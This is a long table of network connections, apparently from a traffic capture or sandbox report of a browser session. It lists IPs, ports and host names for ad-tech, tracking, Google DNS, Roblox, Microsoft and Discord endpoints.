| NL | 147.75.81.235:443 | prebid.a-mo.net | tcp |
| DE | 18.197.60.108:443 | btlr.sharethrough.com | tcp |
| DE | 18.197.60.108:443 | btlr.sharethrough.com | tcp |
| DE | 18.197.60.108:443 | btlr.sharethrough.com | tcp |
| DE | 18.197.60.108:443 | btlr.sharethrough.com | tcp |
| DE | 18.157.230.4:443 | tlx.3lift.com | tcp |
| US | 104.18.34.190:443 | elb.the-ozone-project.com | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| FR | 185.255.84.150:443 | hb-api.omnitagjs.com | tcp |
| IE | 54.229.112.66:443 | track.venatusmedia.com | tcp |
| US | 34.95.69.49:443 | i.clean.gg | udp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 8.8.8.8:53 | 112.104.51.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.146.227.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.111.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.34.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.167.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.230.157.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.60.197.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.152.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.166.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.229.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.84.255.185.in-addr.arpa | udp |
| NL | 147.75.81.235:443 | prebid.a-mo.net | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| IE | 18.200.223.87:443 | s.cpx.to | tcp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| GB | 185.64.191.210:443 | image2.pubmatic.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | udp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| DE | 162.19.138.82:443 | id5-sync.com | tcp |
| NL | 69.173.156.148:443 | token.rubiconproject.com | tcp |
| FR | 142.250.75.226:443 | ep1.adtrafficquality.google | tcp |
| FR | 142.250.179.65:443 | f0bcf6eb4f7e278fafc4e5c4bd8204ee.safeframe.googlesyndication.com | tcp |
| GB | 23.214.142.107:443 | tg1.aniview.com | tcp |
| FR | 142.250.179.97:443 | ep2.adtrafficquality.google | tcp |
| GB | 2.17.209.125:443 | feed.avplayer.com | tcp |
| US | 172.240.45.75:443 | track4.aniview.com | tcp |
| GB | 92.123.143.216:443 | player.aniview.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| FR | 185.93.2.246:443 | cdn1.vntsm.com | tcp |
| NL | 178.250.1.9:443 | dis.eu.criteo.com | tcp |
| FR | 142.250.178.129:443 | tpc.googlesyndication.com | tcp |
| FR | 142.250.179.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 65.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.142.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.209.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.250.178.in-addr.arpa | udp |
| GB | 92.123.143.216:443 | content1.avplayer.com | tcp |
| GB | 92.123.143.216:443 | content1.avplayer.com | tcp |
| GB | 23.214.142.107:443 | tg1.aniview.com | tcp |
| IE | 63.32.228.210:443 | rtb.gumgum.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 50.31.142.191:443 | b1sync.zemanta.com | tcp |
| FR | 142.250.179.68:443 | www.google.com | udp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| FR | 142.250.179.68:443 | www.google.com | tcp |
| US | 172.240.45.76:443 | track1.avplayer.com | tcp |
| IE | 63.32.228.210:443 | rtb.gumgum.com | tcp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| DE | 18.197.30.174:443 | match.sharethrough.com | tcp |
| GB | 2.18.108.192:443 | ads.pubmatic.com | tcp |
| IE | 34.252.171.241:443 | ms-cookie-sync.presage.io | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| GB | 95.100.245.251:443 | eus.rubiconproject.com | tcp |
| NL | 89.149.193.84:443 | ssbsync.smartadserver.com | tcp |
| US | 172.240.45.75:443 | track4.aniview.com | udp |
| DE | 37.252.171.85:443 | secure.adnxs.com | tcp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | tcp |
| DK | 37.157.3.26:443 | c1.adform.net | tcp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| NL | 46.228.164.13:443 | d.turn.com | tcp |
| NL | 188.42.189.231:443 | ads.betweendigital.com | tcp |
| IE | 34.247.233.198:443 | usersync.gumgum.com | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| IE | 34.247.233.198:443 | usersync.gumgum.com | tcp |
| IE | 34.247.233.198:443 | usersync.gumgum.com | tcp |
| JP | 211.120.53.202:443 | tg.socdm.com | tcp |
| US | 34.98.64.218:443 | us-u.openx.net | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| GB | 23.214.129.249:443 | secure-assets.rubiconproject.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| IE | 18.200.154.164:443 | pr-bh.ybp.yahoo.com | tcp |
| US | 34.98.64.218:443 | us-u.openx.net | udp |
| JP | 211.120.53.202:443 | tg.socdm.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | tcp |
| US | 52.73.51.45:443 | sync.ipredictive.com | tcp |
| IE | 52.18.134.220:443 | ce.lijit.com | tcp |
| GB | 185.64.190.78:443 | image6.pubmatic.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 8.8.8.8:53 | 90.8.184.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.129.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.53.120.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.216.36.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.154.200.18.in-addr.arpa | udp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 38.91.45.7:443 | match.deepintent.com | tcp |
| US | 34.120.111.33:443 | api.edkt.io | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| FR | 142.250.178.129:443 | tpc.googlesyndication.com | udp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| IE | 108.128.33.72:443 | ice.360yield.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| NL | 69.173.156.149:443 | pixel-eu.rubiconproject.com | tcp |
| US | 34.120.133.55:443 | api.rlcdn.com | tcp |
| GB | 128.116.119.4:443 | auth.roblox.com | tcp |
| GB | 128.116.119.4:443 | auth.roblox.com | tcp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| GB | 92.123.142.144:443 | acdn.adnxs.com | tcp |
| US | 104.18.34.190:443 | elb.the-ozone-project.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | udp |
| GB | 128.116.119.4:443 | auth.roblox.com | tcp |
| IE | 54.72.42.145:443 | sync.crwdcntrl.net | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| NL | 147.75.81.235:443 | prebid.a-mo.net | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| FR | 172.217.20.162:443 | googleads.g.doubleclick.net | tcp |
| US | 52.6.202.249:443 | sync.srv.stackadapt.com | tcp |
| US | 104.17.43.93:443 | gum.aidemsrv.com | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | tcp |
| US | 8.8.8.8:53 | 4.119.116.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.42.72.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssc-cms.33across.com | udp |
| US | 67.202.105.23:443 | ssc-cms.33across.com | tcp |
| GB | 92.123.143.216:443 | content1.avplayer.com | tcp |
| US | 104.17.43.93:443 | gum.aidemsrv.com | tcp |
| GB | 92.123.143.106:443 | static.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | tcp |
| GB | 18.245.253.103:443 | js.rbxcdn.com | tcp |
| US | 18.214.118.225:443 | cs-server-s2s.yellowblue.io | tcp |
| GB | 128.116.119.4:443 | metrics.roblox.com | tcp |
| US | 34.111.129.221:443 | cr.frontend.weborama.fr | udp |
| US | 3.222.152.35:443 | api-2-0.spot.im | tcp |
| US | 172.67.40.173:443 | mwzeom.zeotap.com | tcp |
| US | 8.8.8.8:53 | 225.118.214.18.in-addr.arpa | udp |
| FR | 54.36.150.183:443 | cookie-matching.mediarithmics.com | tcp |
| US | 69.166.1.35:443 | sync.go.sonobi.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| GB | 185.64.191.210:443 | simage2.pubmatic.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| US | 216.200.232.249:443 | sync.mathtag.com | tcp |
| US | 34.128.133.112:443 | ads.avads.net | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| US | 172.240.45.78:443 | sync.aniview.com | tcp |
| NL | 35.214.132.90:443 | u.ipw.metadsp.co.uk | tcp |
| NL | 69.173.156.148:443 | pixel-eu.rubiconproject.com | tcp |
| GB | 92.123.140.97:443 | apis.rbxcdn.com | tcp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| NL | 35.204.158.49:443 | um.simpli.fi | tcp |
| NL | 178.250.1.9:443 | dis.criteo.com | tcp |
| DE | 168.119.72.236:443 | sync.richaudience.com | tcp |
| IE | 52.212.121.90:443 | ap.lijit.com | tcp |
| DE | 51.75.86.98:443 | onetag-sys.com | udp |
| IE | 52.215.131.87:443 | match.prod.bidr.io | tcp |
| US | 52.6.202.249:443 | sync.srv.stackadapt.com | tcp |
| US | 52.6.202.249:443 | sync.srv.stackadapt.com | tcp |
| NL | 35.214.132.90:443 | u.ipw.metadsp.co.uk | udp |
| NL | 89.149.193.84:443 | ssbsync.smartadserver.com | tcp |
| DE | 18.197.30.174:443 | match.sharethrough.com | tcp |
| US | 209.54.182.161:443 | s.amazon-adsystem.com | tcp |
| FR | 217.182.178.233:443 | rtb-csync.smartadserver.com | tcp |
| FR | 217.182.178.233:443 | rtb-csync.smartadserver.com | tcp |
| FR | 154.54.250.81:443 | ads.stickyadstv.com | tcp |
| GB | 216.137.44.23:443 | css.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| GB | 92.123.142.217:443 | images.rbxcdn.com | tcp |
| DE | 168.119.72.236:443 | sync.richaudience.com | tcp |
| FR | 142.250.179.74:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 90.132.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.45.240.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.158.204.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.121.212.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.131.215.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.178.182.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.182.54.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.250.54.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 172.240.45.76:443 | track1.avplayer.com | udp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | tcp |
| US | 172.240.45.78:443 | sync.aniview.com | udp |
| US | 69.173.151.100:443 | pixel-us-east.rubiconproject.com | tcp |
| US | 69.166.1.35:443 | sync.go.sonobi.com | tcp |
| US | 216.200.232.249:443 | sync.mathtag.com | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| US | 192.132.33.68:443 | bttrack.com | tcp |
| GB | 185.64.190.81:443 | image4.pubmatic.com | tcp |
| DE | 18.197.30.174:443 | match.sharethrough.com | tcp |
| IE | 52.215.131.87:443 | match.prod.bidr.io | tcp |
| NL | 35.214.169.131:443 | csync.loopme.me | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| NL | 82.145.213.8:443 | t.adx.opera.com | tcp |
| US | 80.77.87.166:443 | cs.admanmedia.com | tcp |
| IE | 52.30.33.234:443 | cs.yellowblue.io | tcp |
| NL | 185.184.8.90:443 | creativecdn.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| NL | 35.214.174.141:443 | a.sportradarserving.com | tcp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| DE | 80.82.210.217:443 | dsp-cookie.adfarm1.adition.com | tcp |
| US | 69.173.151.100:443 | pixel-us-east.rubiconproject.com | tcp |
| DK | 77.243.51.121:443 | uipglob.semasio.net | tcp |
| NL | 35.214.174.141:443 | a.sportradarserving.com | udp |
| DE | 3.124.210.90:443 | ps.eyeota.net | tcp |
| GB | 185.64.191.214:443 | image8.pubmatic.com | tcp |
| NL | 35.214.169.131:443 | csync.loopme.me | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| IE | 52.18.134.220:443 | ce.lijit.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| NL | 193.0.160.130:443 | p.rfihub.com | tcp |
| NL | 64.227.64.62:443 | match.adsby.bidtheatre.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| NL | 188.42.63.48:443 | dsp-ap.eskimi.com | tcp |
| NL | 64.158.223.137:443 | pubmatic-match.dotomi.com | tcp |
| FR | 54.36.150.183:443 | cookie-matching.mediarithmics.com | tcp |
| US | 8.8.8.8:53 | 90.210.124.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.64.227.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.63.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | capi.connatix.com | udp |
| US | 8.8.8.8:53 | spl.zeotap.com | udp |
| US | 172.64.146.152:443 | capi.connatix.com | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | udp |
| DE | 3.71.149.231:443 | ups.analytics.yahoo.com | tcp |
| NL | 35.214.199.88:443 | rtb.mfadsrvr.com | udp |
| US | 172.111.38.86:443 | tracker.open-adsyield.com | tcp |
| US | 52.73.51.45:443 | sync.ipredictive.com | tcp |
| PL | 18.66.233.19:443 | live.primis.tech | tcp |
| FR | 54.38.113.2:443 | pixel-eu.onaudience.com | tcp |
| SE | 192.229.221.95:80 | cacerts.rapidssl.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| US | 35.186.193.173:443 | ipac.ctnsnet.com | tcp |
| NL | 35.214.169.131:443 | csync.loopme.me | tcp |
| SE | 13.53.196.230:443 | d5p.de17a.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| IE | 3.248.76.205:443 | pm.w55c.net | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| IE | 52.215.155.11:443 | cm.adgrx.com | tcp |
| US | 35.244.174.68:443 | id.rlcdn.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| FR | 141.95.171.140:443 | green.erne.co | tcp |
| US | 172.64.150.63:443 | a.tribalfusion.com | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| FR | 54.38.113.8:443 | pixel-eu.onaudience.com | tcp |
| NL | 46.228.174.117:443 | sync.1rx.io | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 63.150.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.120.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.113.38.54.in-addr.arpa | udp |
| NL | 46.228.164.13:443 | d.turn.com | tcp |
| PL | 108.138.51.79:443 | roblox-api.arkoselabs.com | tcp |
| PL | 108.138.51.79:443 | roblox-api.arkoselabs.com | tcp |
| PL | 108.138.51.79:443 | roblox-api.arkoselabs.com | tcp |
| PL | 108.138.51.79:443 | roblox-api.arkoselabs.com | udp |
| GB | 128.116.119.8:443 | lms.roblox.com | tcp |
| US | 8.8.8.8:53 | aws-eu-central-1c-lms.rbx.com | udp |
| US | 128.116.32.3:443 | lga2-128-116-32-3.roblox.com | tcp |
| US | 128.116.102.3:443 | iad4-128-116-102-3.roblox.com | tcp |
| HK | 18.163.23.88:443 | aws-ap-east-1c-lms.rbx.com | tcp |
| US | 128.116.45.3:443 | mia4-128-116-45-3.roblox.com | tcp |
| NL | 128.116.21.3:443 | ams2-128-116-21-3.roblox.com | tcp |
| DE | 52.28.16.152:443 | aws-eu-central-1c-lms.rbx.com | tcp |
| GB | 108.156.46.104:443 | c0aws.rbxcdn.com | tcp |
| SG | 128.116.50.3:443 | sin4-128-116-50-3.roblox.com | tcp |
| IN | 128.116.104.4:443 | bom1-128-116-104-4.roblox.com | tcp |
| US | 128.116.101.3:443 | ord2-128-116-101-3.roblox.com | tcp |
| HK | 18.163.23.88:443 | aws-ap-east-1c-lms.rbx.com | tcp |
| US | 128.116.45.3:443 | mia4-128-116-45-3.roblox.com | tcp |
| NL | 128.116.21.3:443 | ams2-128-116-21-3.roblox.com | tcp |
| DE | 52.28.16.152:443 | aws-eu-central-1c-lms.rbx.com | tcp |
| GB | 108.156.46.104:443 | c0aws.rbxcdn.com | tcp |
| SG | 128.116.50.3:443 | sin4-128-116-50-3.roblox.com | tcp |
| IN | 128.116.104.4:443 | bom1-128-116-104-4.roblox.com | tcp |
| FR | 142.250.179.74:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 104.46.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.16.28.52.in-addr.arpa | udp |
| GB | 128.116.119.8:443 | lms.roblox.com | tcp |
| US | 69.166.1.64:443 | apex.go.sonobi.com | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| DE | 37.252.172.123:443 | secure.adnxs.com | tcp |
| US | 69.166.1.64:443 | apex.go.sonobi.com | tcp |
| NL | 81.17.55.160:443 | prg.smartadserver.com | tcp |
| DE | 37.252.172.123:443 | secure.adnxs.com | tcp |
| FR | 216.58.215.34:443 | securepubads.g.doubleclick.net | udp |
| DE | 35.157.229.52:443 | 1x1.a-mo.net | tcp |
| DE | 35.157.229.52:443 | 1x1.a-mo.net | tcp |
| IE | 34.247.233.198:443 | usersync.gumgum.com | tcp |
| GB | 18.245.187.105:443 | ib.3lift.com | tcp |
| GB | 18.245.187.105:443 | ib.3lift.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 92.123.140.8:443 | tr.rbxcdn.com | tcp |
| GB | 18.244.114.69:443 | t3.rbxcdn.com | tcp |
| GB | 18.245.187.105:443 | ib.3lift.com | udp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| US | 52.73.51.45:443 | sync.ipredictive.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 204.79.197.237:443 | c.bing.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 204.79.197.237:443 | c.bing.com | tcp |
| IE | 52.215.131.87:443 | match.prod.bidr.io | tcp |
| NL | 178.250.1.17:443 | ads.eu.criteo.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.9:443 | widget.nl3.eu.criteo.com | tcp |
| US | 34.36.216.150:443 | pixel-sync.sitescout.com | udp |
| US | 8.8.8.8:53 | voice.roblox.com | udp |
| NL | 128.116.21.4:443 | badges.roblox.com | tcp |
| US | 8.8.8.8:53 | silver.roblox.com | udp |
| US | 8.8.8.8:53 | cdg1-128-116-122-3.roblox.com | udp |
| US | 8.8.8.8:53 | mia2-128-116-127-3.roblox.com | udp |
| US | 8.8.8.8:53 | c0ak.rbxcdn.com | udp |
| US | 8.8.8.8:53 | aws-eu-west-2a-lms.rbx.com | udp |
| US | 8.8.8.8:53 | atl1-128-116-99-3.roblox.com | udp |
| US | 8.8.8.8:53 | aws-ap-east-1b-lms.rbx.com | udp |
| US | 8.8.8.8:53 | c0.rbxcdn.com | udp |
| GB | 18.130.200.10:443 | aws-eu-west-2b-lms.rbx.com | tcp |
| GB | 128.116.119.3:443 | silver.roblox.com | tcp |
| GB | 92.123.140.73:443 | c0.rbxcdn.com | tcp |
| GB | 92.123.142.235:443 | c0.rbxcdn.com | tcp |
| GB | 13.40.255.29:443 | aws-eu-west-2a-lms.rbx.com | tcp |
| FR | 128.116.122.3:443 | cdg1-128-116-122-3.roblox.com | tcp |
| US | 128.116.127.3:443 | mia2-128-116-127-3.roblox.com | tcp |
| US | 128.116.99.3:443 | atl1-128-116-99-3.roblox.com | tcp |
| HK | 16.163.186.39:443 | aws-ap-east-1b-lms.rbx.com | tcp |
| NL | 89.207.16.204:443 | triplelift-match.dotomi.com | tcp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | udp |
| GB | 18.130.200.10:443 | aws-eu-west-2b-lms.rbx.com | tcp |
| GB | 128.116.119.3:443 | silver.roblox.com | tcp |
| HK | 16.163.186.39:443 | aws-ap-east-1b-lms.rbx.com | tcp |
| NL | 178.250.1.9:443 | widget.nl3.eu.criteo.com | tcp |
| US | 50.31.142.191:443 | b1sync.zemanta.com | tcp |
| NL | 128.116.21.4:443 | badges.roblox.com | tcp |
| DE | 37.252.172.123:443 | secure.adnxs.com | tcp |
| FR | 217.182.178.233:443 | rtb-csync.smartadserver.com | tcp |
| NL | 128.116.21.4:443 | badges.roblox.com | tcp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| NL | 178.250.1.6:443 | cat.nl3.eu.criteo.com | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| NL | 141.226.228.48:443 | sync-t1.taboola.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| NL | 141.226.228.48:443 | sync-t1.taboola.com | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| NL | 178.250.1.25:443 | csm.eu.criteo.net | tcp |
| FR | 185.255.84.152:443 | visitor.omnitagjs.com | tcp |
| US | 104.18.36.155:443 | r.casalemedia.com | tcp |
| DE | 162.19.138.116:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | contextual.media.net | udp |
| US | 8.8.8.8:53 | jadserve.postrelease.com | udp |
| US | 8.8.8.8:53 | sync.outbrain.com | udp |
| US | 8.8.8.8:53 | ad.yieldlab.net | udp |
| US | 8.8.8.8:53 | imageproxy.eu.criteo.net | udp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| GB | 128.116.119.4:443 | client-telemetry.roblox.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| N/A | 127.0.0.1:51043 | | tcp |
| GB | 128.116.119.4:443 | client-telemetry.roblox.com | tcp |
| N/A | 127.0.0.1:51075 | | tcp |
| GB | 128.116.119.4:443 | client-telemetry.roblox.com | tcp |
| N/A | 127.0.0.1:51080 | | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| PL | 18.66.233.25:443 | clientsettingscdn.roblox.com | tcp |
| US | 8.8.8.8:53 | setup.rbxcdn.com | udp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| N/A | 127.0.0.1:51095 | | tcp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| GB | 92.123.142.144:443 | setup.rbxcdn.com | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.15:443 | imageproxy.eu.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 20.7.47.135:443 | msedge.api.cdp.microsoft.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| US | 8.8.8.8:53 | 135.47.7.20.in-addr.arpa | udp |
| GB | 92.123.140.40:80 | msedge.f.tlu.dl.delivery.mp.microsoft.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| GB | 128.116.119.4:443 | www.roblox.com | tcp |
| GB | 128.116.119.4:443 | www.roblox.com | tcp |
| N/A | 127.0.0.1:51617 | | tcp |
| N/A | 127.0.0.1:51620 | | tcp |
| GB | 104.86.110.98:443 | | tcp |
| GB | 104.86.110.98:443 | | tcp |
| US | 52.168.117.171:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| GB | 104.86.110.98:443 | | tcp |
| GB | 104.86.110.98:443 | | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 92.123.142.97:443 | r.bing.com | tcp |
| GB | 92.123.142.97:443 | r.bing.com | tcp |
| GB | 92.123.142.97:443 | r.bing.com | tcp |
| GB | 92.123.142.97:443 | r.bing.com | tcp |
| GB | 92.123.142.97:443 | r.bing.com | tcp |
